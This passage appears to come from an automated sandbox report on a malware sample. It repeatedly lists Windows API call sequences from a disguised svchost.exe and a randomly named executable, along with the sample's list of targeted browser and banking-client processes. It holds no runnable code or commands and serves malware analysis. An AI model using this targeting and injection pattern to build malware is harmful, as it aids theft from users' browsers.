GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	1_2_02D367D0
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	1_2_02D367D0
Source: C:\Windows\apppatch\svchost.exe	Code function: GetCommandLineA,StrStrIA,memset,IsUserAnAdmin,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe	1_2_02D31660
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	1_2_02D237E0
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	1_2_02D237E0
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	1_2_02D237E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_028A7300
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_028A7300
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_028A7300
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	5_2_028A67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe	5_2_028A67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe	5_2_028A67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe	5_2_028A67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	5_2_028A67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	5_2_028A67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe	5_2_028A1660
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_028937E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_028937E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_028937E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	6_2_02457300
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	6_2_02457300
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	6_2_02457300
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	6_2_024567D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,C